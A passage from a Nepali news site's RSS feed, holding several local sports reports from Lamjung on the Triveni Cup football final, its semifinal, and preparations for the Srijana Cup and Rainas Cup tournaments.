गण्डकी प्रदेश सरकारका मुख्यमन्त्री सुरेन्द्रराज पाण्डेकको प्रमुख आतिथ्यतामा सो प्रतियोगिताको समापन कार्यक्रम भएको थियो । पुरस्कार वितरण गर्दै उहाँले उक्त प्रतियोगिता निरन्तर ३३ वर्षसम्म सञ्चालन गर्नु त्यो पनि यति धेरै पुरस्कार राशिका साथ भन्दै आयोजकको प्रशंसा गर्नु भयो । यति धेरै मान्छे गण्डकी प्रदेशको कुनै खेलमा पनि उपस्थिति हुने गरेको आफूले नदेखेको मुख्यमन्त्री पाण्डेले बताउँदै मुख्यमन्त्री पाण्डेले प्रदेश सरकारले खेल क्षेत्रलाई प्राथमिकता राख्दै यसको विकासमा लागिपरेको बताउनुभयो । खेलको माध्यमबाटै युवाहरूको प्रतिभा पहिचानसँगै खेडालीलाई व्यवसायिक रुपमा स्थापित गर्ने, नाम र दाम दुवै कमाउने अवस्थामा सृजना गर्न खेल विकासमा प्रदेश सरकार लागिपरेको मुख्यमन्त्री पाण्डेले उल्लेख गर्नुभयो । उहाँले गण्डकी प्रदेश खेलकुदका लागि राम्रो रहेको र यस्ता खेलकुद आयोजनाले पर्यटन विकासमा सहयोग पुर्याउनुका साथै स्थानीयको आम्दानी समेत बढ्ने बताउनुभयो ।
तीनवर्ष लगातर त्रिवेणीपकको समापनमा उपस्थित भइरहँदा सहजी खेलमैदान स्तरउन्नतीका गतवर्ष आफूले प्रतिवद्धता गरे अनुसार बजेट उपलव्ध नभएकाले सो बजेट उपलव्ध हुनेमा विश्वस्त रहन आग्रह गर्नुभयो ।
उहाँले नगरपालिकालाई प्रदेश सरकारसग समन्वय गरी पूर्ण साईजको खेल मैदान अर्थात रङ्गशालामा परिणत गर्न निर्देशन दिनु भयो । उहाँले आफूले पनि सो कार्यमा मुख्यमन्त्री पाण्डेले सक्दो सहयोग गर्ने प्रतिवद्धता समेत व्यक्त गर्नु भयो ।
अर्को एक प्रसङ्गमा पछिल्लो समय युवा पुस्ताले सामाजिक सञ्जालदेखि अन्य ठाउँमा मनलाग्दी बोल्दा समाजमा नकारात्मक असर परेकोप्रति चिन्ता व्यक्त गर्दै सबैले सोच विचारका साथ सकरात्मक धारणा मात्र व्यक्त गर्नुपर्नेमा जोड दिनुभयो ।
सो अवसरमा आयोजक क्बलको संस्थापक कोषाध्यक्ष एवम् पूर्वअध्यक्ष समेत रहेका गण्डकी प्रदेश सरकारका वन तथा वातावरण मन्त्री भेषबहादुर पौडेलले स्थापनाकालीन इतिहासको स्मरण गरेका थिए ।
कार्यक्रममा एन्फाका अध्यक्ष पकंज विक्रम नेम्बाङले खेलको विकासको लागि सवै निकायको साथ र सहकार्य आवश्यक रहेको बताउनुभयो ।
प्रतियोगिता उपाधी विजेता एपिएफले १२ लाख पुरस्कार राशी सहित त्रिवेणी कप, स्वर्णपदक हात पारेको छ । प्रतियोगिताको उपविजेता लाङदीदेवी युवा क्लव नाल्माले ६ लाख रुपैया सहित, रजतपदक हात पारेको छ ।
प्रतियोगिता अवधिभर समान ३/३ गोल गरेर एपिएफ क्लवका समिर थोकर र प्रदिप लामा सर्वाधिक गोलकर्ता घोषित भएका छन् । उनीहरूलाई नगद २५ हजार रुपैयाँ र ट्रफी प्रदान गरिएको छ । यसैगरी एपिएफका गोल किपर एञ्जल श्रेष्ठ वेष्ट गोेलकिपर घोषित भएसँगै उनले पनि नगद २५ हजार रुपैयाँ ट्रफी हात पारेका छन् । एपीएफकै खेलाडी सन्तोष खत्री फाइनाल खेलको म्यान अफ दि म्याच घोषित भए । उनलाई नगद १० हजार रुपैयाँ र ट्रफी प्रदान गरिएको आयोजक त्रिवेणी युुवा क्लवका अध्यक्ष टेकजंग गुरुङले बताए । उनका अनुसार गत वर्षसम्म सेमिफाइनलमा पराजित दुई टोलीलाई प्रदान गरिँदै आएको २–२ लाख रुपैयाँको पुरस्कार भने यस वर्ष हटाइएको छ ।
आयोजक क्लवका अध्यक्ष टेकजंग गुरुङको अध्यक्षतामा भएको पुरस्कार वितरण कार्यक्रममा संविधान सभा सदस्य जमिन्द्रमान घले, प्रदेश सदस्य, पार्वती तामाङ, मुनिन्द्रजंग गुरुङ, जिल्ला समन्वय समितिका प्रमुख पूर्णबहादुर गुरुङ, प्रमुख जिल्ला अधिकारी उमेश ढुंगाना, सहित पालिका प्रमुख तथा अध्यक्षहरू, प्रहरी नायव उपरिक्षक रेशम बोहरा, वडाअध्यक्षहरू विभिन्न कार्यालय र संघ सस्थाका प्रमुख एवम् प्रतिनिधिका साथ जिल्ला भित्र र वाहिरका गरी हजारौँ खेलप्रेमी दर्शकको सहभागिता रहेको थियो ।
क्लवका पूर्व अध्यक्ष विनोद गुरुङले सञ्चालन गर्नु भएको समापन कार्यक्रममा क्लवका उपाध्यक्ष खुशीजङ गुरुङले स्वागत मन्तव्य राख्नुभएको थियो ।
पुस १२ देखि सुरु भएको ३३ औँ त्रिवेणी कप राष्ट्रिव्यापि फुलबल प्रतियोगितामा ६ आमन्त्रित सहित १६ टिमले भाग लिएका थिए ।

]]>
https://www.antaranganews.com/?feed=rss2&p=37732 0
३० औं सिर्जना कप फुटबल तथा माघी मेला २०८२ को तयारी युद्धस्तरमा https://www.antaranganews.com/?p=37703 https://www.antaranganews.com/?p=37703#respond Sun, 04 Jan 2026 05:34:46 +0000 https://www.antaranganews.com/?p=37703 बेसीशहर– लमजुङको मर्स्याङदी गाउँपालिका– ६ को ठूलाबेसीमा सञ्चालन हुँदै आएको सिर्जना कप फुटबल तथा माघी मेलाको तयारी यु्द्धस्तरमा भइरहेको छ । सोशी वडा स्थित सिर्जना युवा क्लबको आयोजनामा हुने सो प्रतियोगिता तथा मेलाको कार्यक्रम बारेमा यहाँ पत्रकार सम्मेलन गरी पुस १९ गते जानकारी दिइएको हो ।
साताव्यापी रुपमा मनाइने उक्त माघी मेलाका अवसरमा खेलाइने फुटबल प्रतियोगिताको यो वर्ष ३० औं शृंखला भएको जानकारी दिइएको थियो । क्लबका अध्यक्ष देवीराज अधिकारीले चार पेज लामो कार्यक्रम तालिका पत्रकारहरूका बीचमा प्रस्तुत गर्दै यो वर्षबाट खेल मैदान विस्तार गरी ६० मिटर लम्बाई र ३० मिटर चौडाई बनाएर ३० औं सिर्जना कप फुटबल प्रतियोगिता सञ्चालन गर्न लागिएको बताउनु भयो ।
सो मेलामा करिब पाँच हजार दर्शकहरूले हेर्ने आंकलन गरिएको बताउँदै अध्यक्ष अधिकारीले मेलाको पृष्ठभूमिका बारेमा समेत जानकारी दिनु भएको थियो । उहाँका अनुसार विभिन्न जातजातिका करिब १५० घरपरिवारको बसोबास रहेको ठूलीबेसी गाउँमा विगतको २९ वर्षदेखि सो प्रतियोगिता र मेला गर्दै आएको हो । फुटबल प्रतियोगिताका लागि पहिलो पुरस्कार एक लाख ५० हजार रुपैयाँ, सिर्जना कप, स्वर्ण पदक र प्रमाणपत्र, दोस्रो हुने टिमलाई ७५ हजार नगद, रजत पदक र प्रमाणपत्र, सेमीफाइनल चरणमा प्रवेश गर्ने टिमका लागि १५ हजार रुपैयाँ, सर्बोत्कृष्ठ खेलाडीलाई सात हजार र ट्रफी, सर्वोत्कृष्ठ गोलरक्षक र सर्वाधिक गोलकर्तालाई ५/५ हजार रुपैयाँ र ट्रफि दिइने कार्यक्रम रहेको सो प्रतियोगिताका खेल संयोजक करण थापाले बताउनु भयो । उहाँका अनुसार सो प्रतियोगितामा १६ टिमलाई मात्र सहभागी गराइने जानकारी दिदै फस्ट कम फस्टलाई प्राथमिकता दिइने छ ।
मर्स्याङदी गाउँपालिका भित्रका धावकका लागि मिनिम्याराथुन :
उक्त अवसरमा १० किमि दुरीको मर्स्याङदी गाउँपालिका भित्रका धावकका लागि मात्र पालिकास्तरीय मिनी म्याराथुन प्रतियोगिता (पाँचौं) समेत गरिने भएको समेत जानकारी आयोजक क्लबका सचिव रामप्रसाद परियारले बताउनु भएको छ । उहाँका अनुसार सो प्रतियोगितामा पहिलो, दोस्रो, तेस्रो हुनेलाई क्रमशः १०, ७ र ५ हजार नगद सहित मेडल र प्रमाणपत्र पुरस्कार प्रदान गर्ने तयारी छ । उहाँले भन्नुभयो, ‘मिनी म्याराथुन प्रतियोगिता मेलाको पहिलो दिन पुस २७ गते बिहान गरिने र त्यसको दुरीस्थल ठूलीबेसीदेखि खुदी बजारसम्म सञ्चालन गरिने बताइएको छ ।’
यसैगरी, उक्त अवसरमा माघ १ गतेका दिन खुला छेलो प्रतियोगिता सञ्चालन गर्ने कार्यक्रम रहेको बताइएको छ । सो प्रतियोगितामा पहिलो पुरस्कार १०, ५ र ३ हजार रुपैयाँ, मेडल र प्रमाणपत्र दिइने जानकारी दिनुभयो ।
ठाडोभाकाको प्रस्तुति रहने :
यो वर्ष पुस ३० गतेका दिन बेलुका अर्थात राती(८ बजेदेखि ११ बजेसम्म) ठाडोभाका लोककला प्रतिष्ठान नेपाल, लमजुङ (संरक्षक एवम् ठाडोभाका महानायक बुद्धिमान दुरा ‘धम्पु’ र उहाँका गायन जोडी एवम् प्रतिष्ठानका उपाध्यक्ष सीतादेवी दुरालगायत)को टिमको ठाडोभाका प्रस्तुति रहने भएको आयोजक क्लबका संस्थापक अध्यक्ष एवम् सल्लाहकार तथा ठाडोभाका लोककला प्रतिष्ठानका आजीवन सदस्य बेलबहादु्र थापाले बताउनु भएको छ । उहाँका अनुसार सोही अवसरमा स्थानीय कलाकारहरूको सांस्कृतिक कार्यक्रम(नृत्य)का साथमा झाँक्री नाच समेत देखाउने तयारी छ । उहाँले भन्नुभयो, ‘फुटबल प्रतियोगिता र सांस्कृतिक कार्यक्रम सुरुका वर्षदेखिनै सँगसँगै सञ्चालन हुँदै आएको छ ।’
साताव्यापी उक्त माघी मेलाको माघ ३ गते समापन गर्ने कार्यतालिका रहेको आयोजकको भनाइ छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=37703 0
३३ औं त्रिवेणीकप फुटबल प्रतियोगिता अन्तिम चरणतर्फ : साविक विजेता एपीएफ फाइनल प्रवेश https://www.antaranganews.com/?p=37698 https://www.antaranganews.com/?p=37698#respond Sun, 04 Jan 2026 03:56:52 +0000 https://www.antaranganews.com/?p=37698 बसीशहर– लमजुङको जिल्ला सदरमुकाममा जारी ३३ औं त्रिवेणीकप फुटबल प्रतियोगिता अन्तिम चरणमा प्रवेश गरेको छ । प्रतियोगिताको भोलि पुस २१ गते फाइनल खेल हुने भएको छ ।
त्रिवेणी युवा क्लबले आयोजना गरेको सो प्रतियोगिताको आज हुने दोस्रो सेमिफाइनल खेल हुने तयारी छ । आज लाङ्दीदेवी र काठमाडौंको चर्च व्वाइजका बीचमा सो खेल हुने भएको हो । आज जित्ने टिमले भोलि साविकको विजेता टिम एपिएफ फुटबल क्लव फाइनलमा भिड्ने छन् ।
हिजो भएको पहिलो सेमिफाइनलमा एपिएफले लमजुङ मस्र्याङदीलाई ट्राइब्रेकरमा ४– ३ गोल अन्तरले पराजित गरेको हो । यसप्रकार साविक विजेता एपिएफ फुटबल क्लवले लमजुङ मस्र्याङदी युवा क्लव बेसीशहरलाई ट्राइब्रेकरमा पराजित गर्दै ३३ औँ त्रिवेणी कपको फाइनलमा प्रवेश गरेको हो ।
सो प्रतियोगिता बेसीशहर– ७ सहजीस्थित त्रिवेणी रगंशालामा सञ्चालन भइरहेको छ । सो राष्ट्रव्यापी फुटबल प्रतियोगिता अन्तर्गत भएको निर्धारित खेल समयमा १– १ गोलको बरावरी भएपछि २० मिनेट समय थप गरिएको थियो । थप समयमा कुनै पनि पक्षबाट गोल हुन नसकेपछि ट्राइब्रेकरमा एपीएफले जित निकालेको हो ।
खेलको ४१ औं मिनेटमा गोल गरी मस्र्याङदीका ओलावले अफिजले सुरुवाती अग्रता दिलाएका थिए भने दोस्रो हाफको इन्जुरी समयमा एपीएफका मानवहादुर रानाले गोल गरेसँगै बरावरी भएको थियो । त्यसअघि १० जना खेलाडीमा मात्र सीमित रहेको एपीएफले मस्र्याङ्दीसीत १–१ गोलको बराबरी भएको थियो ।
ट्राइब्रेकरमा एपीएफका अनिश घर्ती, सन्तोष खत्री, युवराज खड्का र विश्वार उदासले गोल गरेका थिए भने दिपेश धिमाल र महेश लामाले गोल गर्न सकेनन् । मस्र्याङदीका अरोन थापा, विलियम एलेन र निग्मा मगरले गोल गरे भने पोषण थापा, अभिषेक महतो र अविनाश स्याङतानले गोल गर्न नसकेको आयोजकको भनाइ छ ।
उक्त प्रतियोगिताको एपीएफ क्लबका गोल कीपर एञ्जल श्रेष्ठ म्यान अफ दि म्याच घोषित भएका छन् । जिल्ला प्रहरी कार्यालय लमजुङका प्रमुख प्रहरी नायव उपरीक्षक रेशम बोहोराले पुरस्कार स्वरुप एन्जल श्रेष्ठलाई नगद १० हजार रुपैयाँ र ट्रफी हस्तान्तरण गर्नुभएको थियो ।
सेमिफाइनलको दोस्रो खेल लाङदीदेवी युवा क्लव नाल्मा र चर्च ब्वाईज युनाईटेड विच आज दिउँसो १ बजे हुने आयोजकको भनाइ छ ।
सेमीफाइनालको दोस्रो खेल आज दिउँसो १ः०० बजे लाङ्दीदेवी युवा क्लव नाल्मा र एपी पावर चर्ज बोइज काठमान्डौविच हुने आयोजक त्रिवेणी युवा क्लवका अध्यक्ष टेकजंग गुरुङले बताउनुभयो । उहाँका अनुसार प्रतियोगिताको विजेताले १२ लाख रुपैयाँ नगदसहित ट्रफी, मेडल र प्रमाणपत्र प्राप्त गर्नेछ । उपविजेताले ६ लाख रुपैयाँ नगदसहित मेडल र प्रमाणपत्र प्रदान गरिने छ । सर्वोत्कृष्ट खेलाडी, सर्वाधिक गोलकर्ता र उत्कृष्ट गोलकिपरलाई जनही २५ हजार रुपैयाँ नगदसहित ट्रफी र प्रमाणपत्र प्रदान गरिने गुरुङले बताउनुभयो । गत वर्षसम्म सेमिफाइनलमा पराजित दुई टोलीलाई प्रदान गरिँदै आएको २–२ लाख रुपैयाँको पुरस्कार भने यस वर्षदेखि हटाइएको आयोजकले जनाएको छ ।
उक्त प्रतियोगिताको फाइनल खेल भोलि पुस २१ गते हुने भएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=37698 0
लमजुङमा पाँचौं राइनास कप खुला फुटबल प्रतियोगिता साथमा गोरु जुधाईको तयारी सुरु https://www.antaranganews.com/?p=37672 https://www.antaranganews.com/?p=37672#respond Sat, 03 Jan 2026 01:52:43 +0000 https://www.antaranganews.com/?p=37672 बेसीशहर– लमजुङको पूर्वी क्षेत्रमा सञ्चालन हुने पाँचौं राइनास कप खुला फुटबल प्रतियोगिताको तयारी सुरु गरिएको छ । आयोजक गौलीटार क्षेत्रीय खेलमैदान समितिले पत्रकार सम्मेलनको आयोजना गरी प्रतियोगिताको तयारी गरिएको पुस १८ गते जानकारी दिइएको हो ।
सो फुटवल प्रतियोगिताको थप आकर्षकका रुपमा यो वर्ष राइनास नगरपलिका भित्रका किसानहरूले पालेका गोरुहरू विच गोरु जुधाई प्रतियोगिता समेत आयोजना गरिएको आयोजक संस्थाका अध्यक्ष टेकेन्द्र चिलुवालले बताउनुभयो ।
सो प्रतियोगिता राइनास नगरपालिका– ६ स्थित गौलीटार खेल मैदानमा सञ्चालन गरिने भएको आयोजक समितिका सचिव प्रदिपजंग गुरुङले जनाकारी दिनु भएको हो । उहाँले उक्त प्रतियोगिताका लागि २१ लाख ६५ हजार खर्च लाग्ने जानकारी दिनु हुँदै त्यो खर्चका शिर्षक तथा पुरस्कारका बारेमा प्रकाश पार्नु भएको थियो । उहाँले भन्नुभयो, ‘सो प्रतियोगिता आउँदो माघ १ गतेबाट सुरु हुने छ ।’
सो प्रतियोगितामा पहिलो हुने टिमले पाँच लाख रुपैयाँ नगद, कप, मेडल र प्रमाणपत्र पाउने छ । त्यस्तै दोस्रोहुने टिमले दुई लाख ५० हजार रुपैयाँ नगद, कप, मेडल र प्रमाणपत्र पाउने छ । त्यस्तै, सर्वोत्कृष्ठ खेलाडी, सर्वाधिक गोलकर्ता र उत्कृष्ठ गोलकिपरलाई जनही १५ हजार रुपैयाँ नगद र प्रमाणपत्र प्रदान गरिन भएको आयोजक समितिका सचिव प्रदिपजङ गुरुङले बताउनुभयो । उहाँका अनुसार सो खेल माघ १ गतेदेखि सुरु हुनेछ ।
उहाँका अनुसार खेलको खर्च विगतका वर्षझैं यो वर्ष पनि राइनास नगरपालिका, गण्डकी प्रदेश सरकार, विभिन्न संघ, संस्था प्रायोजक, सहप्रायोजक, व्यवसायी एवम् खेलप्रेमीहरूबाट सहयोगको अपेक्षा गरिएको छ ।
सो प्रतियोगिता विगतका वर्षजस्तै यो वर्ष पनि माघे संक्रान्तिको दिनमा उद्घाटन हुने तयारी रहेको आयोजकको भनाइ छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=37672 0